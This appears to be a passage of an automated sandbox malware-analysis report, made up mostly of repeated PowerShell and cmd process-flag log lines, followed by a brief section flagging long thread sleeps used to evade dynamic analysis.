Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2924 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
